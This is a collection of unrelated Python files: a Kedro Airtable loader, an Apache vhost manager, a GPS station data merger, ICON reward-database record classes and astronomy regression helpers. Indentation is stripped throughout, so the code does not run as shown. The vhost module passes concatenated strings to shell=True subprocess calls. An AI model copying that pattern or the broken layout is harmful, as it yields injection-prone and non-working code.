AIRTABLE_RECORD_ID_COLUMN: record['id'],
AIRTABLE_CREATED_TIME_COLUMN: record['createdTime'],
}
for record in raw_records
]
def _load(self) -> Any:
raw_records = self._retrieve_records()
clean_records = self._clean_records(raw_records)
return pandas.DataFrame(clean_records)
def _save(self, data: Any) -> None:
raise DataSetError('Save Unsupported')
def _describe(self) -> Dict[str, Any]:
return dict(
table_name=self._table_name,
view=self._view,
base_id=self._base_id,
)
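# --- Illustrative sketch (added; not part of the original module): constructing the
# --- dataset directly instead of through a Kedro catalog entry. The base_id / api_key
# --- values below are placeholders, not real credentials.
#   dataset = AirtableDataSet(
#       table_name="Contacts",
#       credentials={"base_id": "appXXXXXXXXXXXXXX", "api_key": "keyXXXXXXXXXXXXXX"},
#   )
#   df = dataset.load()  # DataFrame with __airtable_id / __airtable_created_time columns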
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# name: vhost.py
# author: <NAME>
# email: <EMAIL>
# created on: 11/03/2015
#
# pylint: disable=no-member
# TODO: add SSL capabilities
"""
ww.vhost
~~~~~~~~
A class to create Apache vhost configurations.
It extends WWFile.
"""
from __future__ import absolute_import, print_function
import subprocess
try:
from ext_pylib.files import Parsable
from ext_pylib.input import prompt, prompt_str
except ImportError:
raise ImportError('ext_pylib must be installed to run ww')
from . import settings as s
from .ww_file import WWFile
def run_command(command):
"""A function to run os commands."""
try:
retcode = subprocess.call(command, shell=True)
if retcode > 0:
print("Command was terminated by signal ", -retcode)
return False
else:
print("Command completed successfully.")
return True
except OSError as error:
print("Command: '" + command + "' failed. ")
print(error)
class Vhost(Parsable, WWFile):
"""A class that describes an Apache vhost configuration.
This is primarily a wrapper for vhost managment.
"""
def __init__(self, atts):
"""Initializes a Vhost file."""
        self.regexes = {'directory' : ('<Directory "([^"\n]*)"',
'<Directory {0}>'),
'htdocs' : ('DocumentRoot ["]?([^"\n]*)',
'DocumentRoot {0}'),
'error_log' : ('ErrorLog ["]?([^"\n]*)',
'ErrorLog {0}'),
'access_log' : ('CustomLog ["]?([^"\n]*)',
'CustomLog {0}'),}
self.setup_parsing()
super(Vhost, self).__init__(atts)
def create(self, data=''):
"""Creates a vhost file."""
# pylint: disable=attribute-defined-outside-init,redefined-variable-type
if data:
self.data = data
super(Vhost, self).create()
self.enable()
def parse(self):
"""Parses an existing vhost file (or the contents of memory).
Prompts when an attribute can't be found."""
self.read()
for attribute in ['htdocs', 'error_log', 'access_log']:
if not getattr(self, attribute, None):
                print('Could not parse "' + attribute + '".')
                setattr(self, attribute, prompt_str('What is the ' + attribute + ' path?'))
htdocs = getattr(self, 'htdocs')
if isinstance(htdocs, list):
htdocs = htdocs[0]
access_log = getattr(self, 'access_log')
if isinstance(access_log, list):
access_log = access_log[0]
error_log = getattr(self, 'error_log')
if isinstance(error_log, list):
error_log = error_log[0]
log = access_log.rsplit('/', 1)[0]
return {'htdocs' : {'path' : htdocs},
'access_log' : {'path' : access_log},
'error_log' : {'path' : error_log},
'log' : {'path' : log}}
def verify(self, repair=False):
"""Verifies that the vhost file exists and is enabled."""
result = super(Vhost, self).verify(repair)
if not self.is_enabled():
print('Vhost configuration file for ' + self.domain + ' is not enabled.')
if not repair:
return False
else:
self.enable(False)
print('Vhost for ' + self.domain + ' is enabled.')
return result
def is_enabled(self):
"""Checks if apache is serving this vhost."""
cmd = s.CMD_CHECK_IF_ENABLED.format(self.domain)
try:
if subprocess.check_output(cmd, shell=True) == '':
return False
return True
except subprocess.CalledProcessError:
return False
def enable(self, ask=True):
"""Enables vhost and restarts apache server."""
if self.is_enabled():
return True
if not ask or prompt('Enable ' + self.domain + ' in apache?'):
print('Enabling ' + self.domain + ' vhost...')
return run_command(s.CMD_ENABLE_CONFIG + self.domain) and \
run_command(s.CMD_RESTART_APACHE)
def disable(self, ask=True):
"""Disable vhost and restarts apache server."""
if not self.is_enabled():
return True
if not ask or prompt('Disable ' + self.domain + ' in apache?'):
print('Disabling ' + self.domain + ' vhost...')
return run_command(s.CMD_DISABLE_CONFIG + self.domain) and \
run_command(s.CMD_RESTART_APACHE)
|
#!/usr/local/bin/python
#==========================================================================
# Creates the combined "all_stations.all.input" file for all the stations
# associated with a particular data set type. That is, we will create
# this file of combined inputs for WNAM_Filter_DetrendNeuTimeSeries_jpl,
# WNAM_Clean_DetrendNeuTimeSeries_jpl, etc.
#
# We choose 2004-01-01 as the starting date for this file. The format is
# a series of columns as follows: time, stations1-East, station1-North, station1-Up,
# station2-East, station2-North, station2-Up,..., stationN-East, stationN-North, stationN-Up.
#==========================================================================
import os, sys, string, re
from datetime import date, datetime, timedelta, time
from properties import properties
import linecache
# Useful constants
START_EPOCH="1994-01-01"
BASE_OUTPUT_DIR="./"
SPACE=" "
def getStationName(stationDir):
stationName=stationDir.split("_")[2]
return stationName
def getStationAllRawFile(stationsFullPath):
rawFileName=""
valueSet=False
for file in os.listdir(stationsFullPath):
if(file.endswith(".all.raw")):
rawFileName=file
valueSet=True
break
if valueSet:
return stationsFullPath+"/"+rawFileName
else:
raise Exception("Station directory"+stationsFullPath+" has no .all.raw file")
# Append ${station}-x, ${station}-y, and ${station-z} as column headings
def appendColumnHeadings(stationName,outputTmpList):
newline=outputTmpList[0]+SPACE+stationName+"-x"+SPACE+stationName+"-y"+SPACE+stationName+"-z"
outputTmpList[0]=newline
return
# This is a utility function that converts an isoformatted date string to a date object.
def convertIsoStringToDate(isostringdate):
# Create a fullfledged date object from the string
splitdatestamp=isostringdate.split("-")
theDate=date(int(splitdatestamp[0]),int(splitdatestamp[1]),int(splitdatestamp[2]))
return theDate
# Inspect the raw data line and extract the date as a date object.
def extractRawDataDate(rawline):
# The date and time will be the second entry in the line.
fullTimestamp=rawline.split()[1]
# Split off the date from the time of day.
datestamp=fullTimestamp.split("T")[0]
theDate=convertIsoStringToDate(datestamp)
duplicate=False
if(fullTimestamp.split("T")[1]=="22:22:22"): duplicate=True
return (theDate,duplicate)
# Write the time column with header "time".
def writeTimeColumn(outputTmpList):
outputTmpList.append("time")
iterday=convertIsoStringToDate(START_EPOCH)
while iterday<=date.today():
outputTmpList.append(iterday.isoformat())
iterday+=timedelta(days=1)
return
# Write NaN for stations that don't have data at the given time stamp
def writeNaNColumn(outputTmpList,index):
nanList=["NaN","NaN","NaN"]
# Need to get the original line
appendLineColumns(nanList,outputTmpList,index)
return
# Write station data for given line
def writeStationColumns(line,outputTmpList,lineindex):
splitline=line.split(" ")
stationdata=[splitline[2],splitline[3],splitline[4]]
appendLineColumns(stationdata,outputTmpList,lineindex)
return
# Write the station columns to the composite output file
def appendLineColumns(moreCols, outputTmpList, index):
newline=outputTmpList[index]
for column in moreCols:
newline+=SPACE+column
outputTmpList[index]=newline
return
# A station may have data before the epoch starts, so skip these
def handleStationHasDataBeforeEpoch(epochDate,stationAllRaw,outputTmpList):
with open(stationAllRaw,"r") as allRawFile:
while True:
line=allRawFile.readline()
# The station data ended before the epoch began, so return out of the
# whole function. We don't expect this to happen.
if not line:
print "WARNING: Station " +stationName+ " has no data after "+START_EPOCH
return
# Check the date. If we are up to the epoch start date, break out. Otherwise,
# continue the while and read the next line.
dateStampDate=extractRawDataDate(line)[0]
if(dateStampDate>=epochDate):
break
allRawFile.close()
return
def handlePriorToStationStartDate(epochDate,stationStartDate,outputTmpList,lineindex):
iterday=epochDate
while True:
if(stationStartDate<=iterday):
# We have iterated to the first day with data for this station, so break out
break
else:
writeNaNColumn(outputTmpList,lineindex)
lineindex+=1
iterday+=timedelta(days=1)
return (iterday,lineindex)
def iterateOverDays(iterday,allRawInput,outputTmpList,lineindex):
while iterday<=date.today():
line=allRawInput.readline()
# We have run out of data, so break
if not line: break
# Get the timestamp from the line
(stationDataDate,duplicate)=extractRawDataDate(line)
# Make sure the data's date and iterday match
if(stationDataDate==iterday and not duplicate):
writeStationColumns(line, outputTmpList,lineindex)
else:
writeNaNColumn(outputTmpList,lineindex)
# Go to the next day.
iterday+=timedelta(days=1)
lineindex+=1
return iterday, lineindex
# Handle missing data from station's last data date until today.
def handleStationEndData(iterday,outputTmpList,lineindex):
while iterday<=date.today():
writeNaNColumn(outputTmpList,lineindex)
lineindex+=1
iterday+=timedelta(days=1)
return iterday
# Do the work
def writeAllStationColumns(stationName, stationAllRawName, outputTmpList):
epochDate=convertIsoStringToDate(START_EPOCH)
with open(stationAllRawName,"r") as allRawInput:
# Handle this special case
#handleStationHasDataBeforeEpoch(epochDate,allRawInput,outputTmpList)
# Write out initial data
lineindex=1 # Start at 1 since line 0 is the header
stationStartDate=extractRawDataDate(allRawInput.readline())[0]
(iterday,lineindex)=handlePriorToStationStartDate(epochDate,stationStartDate,outputTmpList,lineindex)
# We are ready to start writing data. Note we expect to break out of this while
# before iterday==today.
# Reset raw date file readline to 0
allRawInput.seek(0)
(iterday,lineindex)=iterateOverDays(iterday,allRawInput,outputTmpList,lineindex)
# We have passed the end of data for the station, so fill the remaining days up to today
# with NaN lines. This may not be executed.
handleStationEndData(iterday, outputTmpList,lineindex)
#close and return
allRawInput.close()
return
#--------------------------------------------------
# Below is the actual execution
#--------------------------------------------------
eval_dir_path = properties('eval_path')
# Loop over each data set
for dataSet in os.listdir(eval_dir_path):
projectDir=eval_dir_path+"/"+dataSet
if(os.path.isdir(projectDir)):
projectAllStationsOutputDir=BASE_OUTPUT_DIR+"/"+dataSet
# Make the directory to hold the output if necessary
if(not os.path.isdir(projectAllStationsOutputDir)): os.makedirs(projectAllStationsOutputDir)
# This is a list to store the lines of the file.
outputTmpList=[]
writeTimeColumn(outputTmpList)
# Loop over station directories
for stationDir in os.listdir(projectDir):
if (os.path.isdir(projectDir+"/"+stationDir)):
stationName=getStationName(stationDir)
try:
stationAllRawName=getStationAllRawFile(projectDir+"/"+stationDir)
appendColumnHeadings(stationName,outputTmpList)
writeAllStationColumns(stationName,stationAllRawName,outputTmpList)
except Exception, e:
print "Something is screwy: ", e
pass
# Write the station values list to the appropriate file.
allInputFileName=projectAllStationsOutputDir+"/"+"all_stations.all.input"
with open(allInputFileName,"w") as allInputFile:
for line in outputTmpList:
allInputFile.write(line+"\n")
allInputFile.close()
del outputTmpList
|
# -*- coding: utf-8 -*-
# Copyright 2019 ICON Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from abc import ABCMeta, abstractmethod
from enum import IntEnum
from typing import Any, TYPE_CHECKING, List, Optional
from ...base.exception import InvalidParamsException
from ...icon_constant import DATA_BYTE_ORDER, RC_DB_VERSION_2, RC_DB_VERSION_0
from ...utils.msgpack_for_ipc import MsgPackForIpc, TypeTag
if TYPE_CHECKING:
from ...base.address import Address
class TxType(IntEnum):
DELEGATION = 0
PREP_REGISTER = 1
PREP_UNREGISTER = 2
INVALID = 99
class Data:
@abstractmethod
def make_key(self, *args, **kwargs) -> bytes:
pass
@abstractmethod
def make_value(self) -> bytes:
pass
@staticmethod
def from_bytes(*args, **kwargs) -> 'Data':
pass
class Header(Data):
PREFIX = b'HD'
def __init__(self):
self.version: int = 0
self.block_height: int = 0
self.revision: int = 0
def make_key(self) -> bytes:
return self.PREFIX
def make_value(self) -> bytes:
data = [
self.version,
self.block_height
]
if self.version >= RC_DB_VERSION_2:
# Added value in version 2
data.append(self.revision)
return MsgPackForIpc.dumps(data)
@staticmethod
def from_bytes(value: bytes) -> 'Header':
data_list: list = MsgPackForIpc.loads(value)
version: int = data_list[0]
if version == RC_DB_VERSION_2:
return Header._from_bytes_v2(data_list)
elif version == RC_DB_VERSION_0:
return Header._from_bytes_v1(data_list)
@staticmethod
def _from_bytes_v1(data_list: list) -> 'Header':
obj = Header()
obj.version: int = data_list[0]
obj.block_height: int = data_list[1]
return obj
@staticmethod
def _from_bytes_v2(data_list: list) -> 'Header':
obj = Header()
obj.version: int = data_list[0]
obj.block_height: int = data_list[1]
obj.revision: int = data_list[2]
return obj
def __str__(self):
info: str = f"[{self.PREFIX}] version: {self.version}, block_height: {self.block_height} "
if self.version >= RC_DB_VERSION_2:
info += f"revision: {self.revision} "
return info
class GovernanceVariable(Data):
PREFIX = b'GV'
def __init__(self):
# key
self.block_height: int = 0
# value
self.version: int = 0
self.calculated_irep: int = 0
self.reward_rep: int = 0
self.config_main_prep_count: int = 0
self.config_sub_prep_count: int = 0
def make_key(self) -> bytes:
block_height: bytes = self.block_height.to_bytes(8, byteorder=DATA_BYTE_ORDER)
return self.PREFIX + block_height
def make_value(self) -> bytes:
data = [
self.calculated_irep,
self.reward_rep,
]
if self.version >= RC_DB_VERSION_2:
# Added value in version 2
data.append(self.config_main_prep_count)
data.append(self.config_sub_prep_count)
return MsgPackForIpc.dumps(data)
@staticmethod
def from_bytes(key: bytes, value: bytes) -> 'GovernanceVariable':
# Method for debugging
data_list: list = MsgPackForIpc.loads(value)
        # needs to be refactored
if len(data_list) > 2:
return GovernanceVariable._from_bytes_v2(key, data_list)
else:
return GovernanceVariable._from_bytes_v1(key, data_list)
@staticmethod
def _from_bytes_v1(key: bytes, data_list: list) -> 'GovernanceVariable':
obj = GovernanceVariable()
obj.block_height: int = int.from_bytes(key[2:], DATA_BYTE_ORDER)
obj.version: int = RC_DB_VERSION_0
obj.calculated_irep: int = data_list[0]
obj.reward_rep: int = data_list[1]
return obj
@staticmethod
def _from_bytes_v2(key: bytes, data_list: list) -> 'GovernanceVariable':
obj = GovernanceVariable()
obj.block_height: int = int.from_bytes(key[2:], DATA_BYTE_ORDER)
obj.version: int = RC_DB_VERSION_2
obj.calculated_irep: int = data_list[0]
obj.reward_rep: int = data_list[1]
obj.config_main_prep_count: int = data_list[2]
obj.config_sub_prep_count: int = data_list[3]
return obj
def __str__(self):
info: str = f"[{self.PREFIX}] key: {self.block_height}," \
f" calculated_irep: {self.calculated_irep}, reward_rep: {self.reward_rep}"
if self.version >= RC_DB_VERSION_2:
info += f"config_main_prep_count: {self.config_main_prep_count}, " \
f"config_sub_prep_count: {self.config_sub_prep_count}"
return info
def make_block_produce_info_key(block_height: int) -> bytes:
return BlockProduceInfoData.PREFIX + block_height.to_bytes(8, byteorder=DATA_BYTE_ORDER)
class BlockProduceInfoData(Data):
PREFIX = b'BP'
def __init__(self):
# key
self.block_height: int = 0
# value
self.block_generator: Optional['Address'] = None
self.block_validator_list: Optional[List['Address']] = None
def make_key(self) -> bytes:
return make_block_produce_info_key(self.block_height)
def make_value(self) -> bytes:
data = [
MsgPackForIpc.encode(self.block_generator),
[MsgPackForIpc.encode(validator_address) for validator_address in self.block_validator_list]
]
return MsgPackForIpc.dumps(data)
@staticmethod
def from_bytes(key: bytes, value: bytes) -> 'BlockProduceInfoData':
# Method for debugging
data_list: list = MsgPackForIpc.loads(value)
obj = BlockProduceInfoData()
obj.block_height: int = int.from_bytes(key[2:], DATA_BYTE_ORDER)
obj.block_generator: 'Address' = MsgPackForIpc.decode(TypeTag.ADDRESS, data_list[0])
obj.block_validator_list: list = [MsgPackForIpc.decode(TypeTag.ADDRESS, bytes_address)
for bytes_address in data_list[1]]
return obj
def __str__(self):
return f"[{self.PREFIX}] " \
f"key: {self.block_height}, " \
f"block_generator: {str(self.block_generator)}, " \
f"block_validators: {[str(addr) for addr in self.block_validator_list]}"
class PRepsData(Data):
PREFIX = b'PR'
def __init__(self):
# key
self.block_height: int = 0
# value
self.total_delegation: int = 0
self.prep_list: Optional[List['DelegationInfo']] = None
def make_key(self) -> bytes:
block_height: bytes = self.block_height.to_bytes(8, byteorder=DATA_BYTE_ORDER)
return self.PREFIX + block_height
def make_value(self) -> bytes:
encoded_prep_list = [[MsgPackForIpc.encode(delegation_info.address),
MsgPackForIpc.encode(delegation_info.value)] for delegation_info in self.prep_list]
data = [
MsgPackForIpc.encode(self.total_delegation),
encoded_prep_list
]
return MsgPackForIpc.dumps(data)
@staticmethod
def from_bytes(key: bytes, value: bytes) -> 'PRepsData':
# Method for debugging
data_list: list = MsgPackForIpc.loads(value)
obj = PRepsData()
obj.prep_list = []
obj.block_height: int = int.from_bytes(key[2:], DATA_BYTE_ORDER)
obj.total_delegation = MsgPackForIpc.decode(TypeTag.INT, data_list[0])
prep_list: list = [
[MsgPackForIpc.decode(TypeTag.ADDRESS, delegation_info[0]),
MsgPackForIpc.decode(TypeTag.INT, delegation_info[1])]
for delegation_info in data_list[1]
]
for prep in prep_list:
del_info = DelegationInfo()
del_info.address = prep[0]
del_info.value = prep[1]
obj.prep_list.append(del_info)
return obj
def __str__(self):
return f"[{self.PREFIX}] " \
f"key: {self.block_height}, total_delegation: {str(self.total_delegation)}"
class TxData(Data):
PREFIX = b'TX'
def __init__(self):
self.address: 'Address' = None
self.block_height: int = 0
self.type: 'TxType' = TxType.INVALID
self.data: 'Tx' = None
def make_key(self, index: int) -> bytes:
tx_index: bytes = index.to_bytes(8, byteorder=DATA_BYTE_ORDER)
return self.PREFIX + tx_index
def make_value(self) -> bytes:
tx_type: 'TxType' = self.type
tx_data: 'Tx' = self.data
if isinstance(tx_data, Tx):
tx_data_type = tx_data.get_type()
if tx_type == TxType.INVALID:
tx_type = tx_data_type
elif tx_type != tx_data_type:
raise InvalidParamsException(f"Mismatch TxType: {tx_type}")
else:
raise InvalidParamsException(f"Invalid TxData: {tx_data}")
data = [
MsgPackForIpc.encode(self.address),
self.block_height,
tx_type,
tx_data.encode()
]
return MsgPackForIpc.dumps(data)
@staticmethod
def from_bytes(value: bytes) -> 'TxData':
# Method for debugging
data_list: list = MsgPackForIpc.loads(value)
obj = TxData()
obj.address: 'Address' = MsgPackForIpc.decode(TypeTag.ADDRESS, data_list[0])
obj.block_height: int = data_list[1]
obj.type: 'TxType' = TxType(data_list[2])
        obj.data: 'Tx' = TxData._convert_tx_data(obj.type, data_list[3])
return obj
@staticmethod
    def _convert_tx_data(tx_type: 'TxType', data: tuple) -> Any:
if tx_type == TxType.DELEGATION:
return DelegationTx.decode(data)
elif tx_type == TxType.PREP_REGISTER:
return PRepRegisterTx.decode(data)
elif tx_type == TxType.PREP_UNREGISTER:
return PRepUnregisterTx.decode(data)
else:
raise InvalidParamsException(f"InvalidParams TxType: {tx_type}")
class Tx(object, metaclass=ABCMeta):
@abstractmethod
def get_type(self) -> 'TxType':
pass
@abstractmethod
def encode(self) -> list:
pass
@staticmethod
@abstractmethod
def decode(data: list) -> Any:
pass
class DelegationTx(Tx):
def __init__(self):
self.delegation_info: List['DelegationInfo'] = []
def get_type(self) -> 'TxType':
return TxType.DELEGATION
def encode(self) -> tuple:
data = [x.encode() for x in self.delegation_info]
return MsgPackForIpc.encode_any(data)
@staticmethod
def decode(data: tuple) -> 'DelegationTx':
data_list: list = MsgPackForIpc.decode_any(data)
obj = DelegationTx()
obj.delegation_info: list = [DelegationInfo.decode(x) for x in data_list]
return obj
class DelegationInfo(object):
def __init__(self):
self.address: 'Address' = None
self.value: int = None
def encode(self) -> list:
return [self.address, self.value]
@staticmethod
def decode(data: list) -> 'DelegationInfo':
obj = DelegationInfo()
obj.address: 'Address' = data[0]
obj.value: int = data[1]
return obj
class PRepRegisterTx(Tx):
def __init__(self):
pass
def get_type(self) -> 'TxType':
return TxType.PREP_REGISTER
def encode(self) -> tuple:
return MsgPackForIpc.encode_any(None)
@staticmethod
def decode(data: tuple) -> 'PRepRegisterTx':
obj = PRepRegisterTx()
return obj
class PRepUnregisterTx(Tx):
def __init__(self):
pass
def get_type(self) -> 'TxType':
return TxType.PREP_UNREGISTER
def encode(self) -> tuple:
return MsgPackForIpc.encode_any(None)
@staticmethod
def decode(data: tuple) -> 'PRepUnregisterTx':
obj = PRepUnregisterTx()
return obj
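# Illustrative round-trip sketch (not part of the original module; the address value is a
# placeholder that would come from the caller):
#
#   tx = TxData()
#   tx.address = some_address            # an 'Address' instance obtained elsewhere
#   tx.block_height = 100
#   tx.type = TxType.PREP_REGISTER
#   tx.data = PRepRegisterTx()
#   raw: bytes = tx.make_value()         # msgpack-encoded payload written as the DB value
#   restored = TxData.from_bytes(raw)    # note: from_bytes() takes only the value, not the key
#   assert restored.block_height == 100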
|
__author__ = "<NAME> :: New Mexico Mira Project, Albuquerque"
""" Module 'astrosupport.stats'.
Numerous statistics and regression classes and functions.
Fork of (extract of) photrix.util, begun 2020-10-23.
Intentions: (1) a separate, importable module for use by all EVD astro python projects.
(2) freely forkable & useful to the astro python global community.
See test file test/test_stats.py for usage.
"""
# Python core packages:
from math import sqrt
# External packages:
import pandas as pd
import statsmodels.regression.mixed_linear_model as sm_mm # NB: only statsmodels version >= 0.8
import statsmodels.api as sm_api # sm version >= 0.8
_____REGRESSION_____________________________________________ = 0
class MixedModelFit:
""" Object: holds info for one mixed-model (py::statsmodel) fit. TESTS OK 2020-10-25.
Generic in nature--NOT tied to astronomical usage.
Uses formula form, i.e., statsmodel::sm_mm.MixedLM.from_formula()
Usage: fit = MixedModelFit(df_input, 'Y', ['X1', 'X2'], 'a_group_type')
fit = MixedModelFit(df_input, 'Y', 'X1', 'a_group_type') (OK if only one indep var)
Fields available from MixedModelFit object:
.converged: True iff mixed model regression converged, else False. [boolean]
.dep_var: name of dependent variable. [string]
.df_fixed_effects, one row per fixed effect & intercept [pandas Dataframe]
columns:
(index): 'Intercept' or name of fixed effect (independent variable)
Name: same as (index)
Value: best value (coefficient) of indep variable from fit
Stdev: std deviation of Value from fit
Tvalue: Value / Stdev from fit
Pvalue: [ignore]
.df_observations, one row per observation used in fit:
columns:
(index):
FittedValue: value predicted from fit for observation
Residual: obs value - fitted value for observation
.df_random_effects: one row per effect group (for photometry, usually one row per image):
columns:
(index): ID of group (for photometry, usually imageID = FITS file name)
GroupName: same as index.
Group ['GroupValue' previously but now obsolete]: random effect for this group
(for photometry, usually 'cirrus effect', the image's average intensity over targets
minus the average of these values over all targets)
.fixed_vars: list of fixed variable names, does not include 'Intercept' [list of strings]
.likelihood: ?
.nobs: count of observations [int]
.sigma: std deviation of residuals over all observations [float]
.statsmodels_object: embedded MixedMLResults object from statsmodels.
(needed for predictions using .predict(); not too directly useful to user)
"""
# TODO: Replace internal 'formula' API with column-name API, which is much more forgiving of var names.
def __init__(self, data, dep_var=None, fixed_vars=None, group_var=None):
""" Executes mixed-model fit & makes data available.
:param data: input data, one variable per column, one point per row. [pandas Dataframe]
:param dep_var: one column name as dependent 'Y' variable. [string]
:param fixed_vars: one or more column names as independent 'X' variable. [string or
list of strings]
:param group_var: one column name as group. (category; random-effect) variable [string]
"""
if not isinstance(data, pd.DataFrame):
print('Parameter \'data\' must be a pandas Dataframe of input data.')
return
if dep_var is None or fixed_vars is None or group_var is None:
print('Provide all parameters: dep_var, fixed_vars, and group_var.')
return
if not isinstance(dep_var, str) or not isinstance(group_var, str):
print('Parameters \'dep_var\' and \'group_var\' must both be strings.')
return
fixed_vars_valid = False # default if not validated
if isinstance(fixed_vars, str):
fixed_vars = [fixed_vars]  # wrap a single variable name in a list; list() would split the string into characters
fixed_vars_valid = True
if isinstance(fixed_vars, list):
if len(fixed_vars) >= 1:
if all([isinstance(var, str) for var in fixed_vars]):
fixed_vars_valid = True
if not fixed_vars_valid:
print('Parameter \'fixed_vars\' must be a string or a list of strings.')
return
formula = dep_var + ' ~ ' + ' + '.join(fixed_vars)
model = sm_mm.MixedLM.from_formula(formula, groups=data[group_var], data=data)
fit = model.fit()
self.statsmodels_object = fit # instance of class MixedLMResults (py pkg statsmodels)
# Scalar and naming attributes:
self.converged = fit.converged # bool
self.nobs = fit.nobs # number of observations used in fit
self.likelihood = fit.llf
self.dep_var = dep_var
self.fixed_vars = fixed_vars
self.group_var = group_var
self.sigma = sqrt(sum(fit.resid**2)/(fit.nobs-len(fixed_vars)-2))
# Fixed-effects dataframe (joins so we don't count on consistent input ordering):
df = pd.DataFrame({'Value': fit.fe_params})
df = df.join(pd.DataFrame({'Stdev': fit.bse_fe})) # join on index (enforce consistency)
df = df.join(pd.DataFrame({'Tvalue': fit.tvalues})) # " & any random effect discarded
df = df.join(pd.DataFrame({'Pvalue': fit.pvalues})) # " & "
df['Name'] = df.index
self.df_fixed_effects = df.copy()
# Random-effect dataframe, index=GroupName, cols=GroupName, GroupValue:
df = pd.DataFrame(fit.random_effects).transpose() # DataFrame, 1 row/group
df = df.rename(columns={'groups': 'Group'}) # was 'GroupValue'
df['GroupName'] = df.index
self.df_random_effects = df.copy()
# Observation dataframe (safe to count on consistent input ordering -> easier construction):
df = pd.DataFrame({'FittedValue': fit.fittedvalues})
df['Residual'] = fit.resid
self.df_observations = df.copy()
def predict(self, df_predict_input, include_random_effect=True):
""" Takes new_data and renders predicted dependent-variable values.
Optionally includes effect of groups (random effects), unlike py::statsmodels.
:param: new_data: new input data used to render predictions.[pandas DataFrame]
Extra (unused) columns are OK; model selects only needed columns.
The columns must include all (indep var and random-effect) columns used to make the model!
:param: include_random_effect: True to include them, False to omit/ignore [bool]
:return: predictions of dependent-variable values matching rows of new data (pandas Series)
"""
# Get predicted values on fixed effects only (per statsmodels' weird def. of 'predicted'):
fixed_effect_inputs = df_predict_input[self.fixed_vars] # 1 col per fixed effect variable
predicted_on_fixed_only = self.statsmodels_object.predict(exog=fixed_effect_inputs)
# If requested, add RE contributions (that were not included in MixedModels object 'fit'):
if include_random_effect:
df_random_effect_inputs = pd.DataFrame(df_predict_input[self.group_var])
df_random_effect_values = self.df_random_effects[['Group']] # was ['GroupValue']
predicted_on_random_only = pd.merge(df_random_effect_inputs, df_random_effect_values,
left_on=self.group_var,
right_index=True, how='left',
sort=False)['Group'] # was 'GroupValue'
total_prediction = predicted_on_fixed_only + predicted_on_random_only
else:
total_prediction = predicted_on_fixed_only
return total_prediction
class LinearFit:
""" Object: holds info for one ordinary multivariate least squares fit. TESTS OK 2020-10-25.
Generic in nature--not tied to astronomical usage.
Internally uses column-name API to statsmodels OLS.
Usage: fit = LinearFit(df_input, 'Y', ['X1', 'X2'])
fit = LinearFit(df_input, 'Y', 'X1') (OK if only one indep var)
Fields available from LinearFit object:
.indep_vars: names of independent variables. [list of strings]
.dep_var: name of dependent variable. [string]
.nobs: count of observations. [int]
.sigma: std deviation of residuals over all observations [float]
.statsmodels_object: embedded RegressionResults object from statsmodels.
(needed for predictions using .predict(); not too directly useful to user)
.df_indep_vars, one row per intercept & independent variables. [pandas Dataframe]
columns:
(index): 'Intercept' or name of fixed effect (independent variable)
Name: same as (index)
Value: best value (coefficient) of indep variable from fit
Stdev: std deviation of Value from fit
Tvalue: Value / Stdev from fit
Pvalue: [ignore]
.df_observations, one row per observation used in fit:
columns:
(index): [int]
FittedValue: value predicted from fit for observation
Residual: obs value - fitted value for observation
"""
def __init__(self, data, dep_var=None, indep_vars=None):
""" Executes ordinary least-squares multivariate linear fit, makes data available.
:param data: input data, one variable per column, one point per row. [pandas Dataframe]
:param dep_var: one column name as dependent 'Y' variable. [string]
:param indep_vars: one or more column names as independent 'X' variable. [string or
list of strings]
"""
if not isinstance(data, pd.DataFrame):
print('Parameter \'data\' must be a pandas Dataframe of input data.')
return
if dep_var is None or indep_vars is None:
print('Provide parameters: dep_var and indep_vars.')
return
if not isinstance(dep_var, str):
print('Parameter \'dep_var\' must be a string.')
return
indep_vars_valid = False # default if not validated
if isinstance(indep_vars, str):
indep_vars = [indep_vars]  # wrap a single variable name in a list; list() would split the string into characters
indep_vars_valid = True
if isinstance(indep_vars, list):
if len(indep_vars) >= 1:
if all([isinstance(var, str) for var in indep_vars]):
indep_vars_valid = True
if not indep_vars_valid:
print('Parameter \'indep_vars\' must be a string or a list of strings.')
return
# Build inputs to regression fn and run it:
y = data[dep_var]
x = data[indep_vars].copy()
x = sm_api.add_constant(x)
model = sm_api.OLS(endog=y, exog=x)
fit = model.fit()
self.statsmodels_object = fit
# Scalar and naming attributes:
self.indep_vars = indep_vars # as passed in
self.dep_var = dep_var # as passed in
self.nobs = fit.nobs
self.sigma = sqrt(fit.mse_resid)  # mse_resid is the residual variance; sqrt gives the std deviation documented above
self.r2 = fit.rsquared_adj
# Make solution (indep vars) dataframe:
df = pd.DataFrame({'Value': fit.params})
df = df.join(pd.DataFrame({'Stdev': fit.bse})) # use join to enforce consistency
df = df.join(pd.DataFrame({'Tvalue': fit.tvalues})) # "
df = df.join(pd.DataFrame({'Pvalue': fit.pvalues})) # "
df.index = ['Intercept' if x.lower() == 'const' else x for x in df.index]
df['Name'] = df.index
self.df_indep_vars = df.copy()
# Make observation dataframe (rows in same order as in input dataframe):
df = pd.DataFrame({'FittedValue': fit.fittedvalues})
df['Residual'] = fit.resid
self.df_observations = df.copy()
def predict(self, df_predict_input):
indep_var_inputs = df_predict_input[self.indep_vars] # 1 column per independent (x) variable
predicted_y_values = self.statsmodels_object.predict(exog=indep_var_inputs)
return predicted_y_values
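# Illustrative usage sketch (column names and values below are made up for demonstration):
#
#   df = pd.DataFrame({'Y': [1.0, 2.1, 2.9, 4.2], 'X1': [1, 2, 3, 4]})
#   fit = LinearFit(df, dep_var='Y', indep_vars='X1')
#   print(fit.df_indep_vars[['Name', 'Value', 'Stdev']])   # intercept and slope with uncertainties
#   predictions = fit.predict(pd.DataFrame({'X1': [5, 6]}))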
_____STATISTICAL_FUNCTIONS__________________________________ = 0
def weighted_mean(values, weights):
""" Returns weighted mean, weighted std deviation of values, and weighted std deviation of the mean.
TESTS OK 2020-10-25.
:param values: list (or other iterable) of values to be averaged
:param weights: list (or other iterable) of weights; length must = length of values
:return: 3-tuple (weighted mean, weighted std dev (population), weighted std dev of mean)
"""
if (len(values) != len(weights)) or (len(values) == 0) or (len(weights) == 0):
